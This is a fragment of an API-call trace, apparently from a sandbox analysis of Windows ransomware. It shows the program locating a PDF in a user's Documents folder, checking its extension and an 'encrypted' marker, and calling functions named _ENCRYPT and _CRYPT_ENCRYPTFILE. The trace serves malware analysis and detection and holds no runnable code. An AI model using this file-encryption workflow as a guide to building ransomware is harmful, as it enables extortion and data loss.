dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.136] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.136] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.136] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.136] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.137] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.137] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.137] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.137] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.137] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.137] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x3287bd80, ftLastWriteTime.dwHighDateTime=0x1d5c359, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 0x7c20c0 [0035.138] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x3287bd80, ftLastWriteTime.dwHighDateTime=0x1d5c359, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 0x7c20c0 [0035.138] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Uc9.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.142] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.142] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.142] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.142] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.142] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.142] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.142] 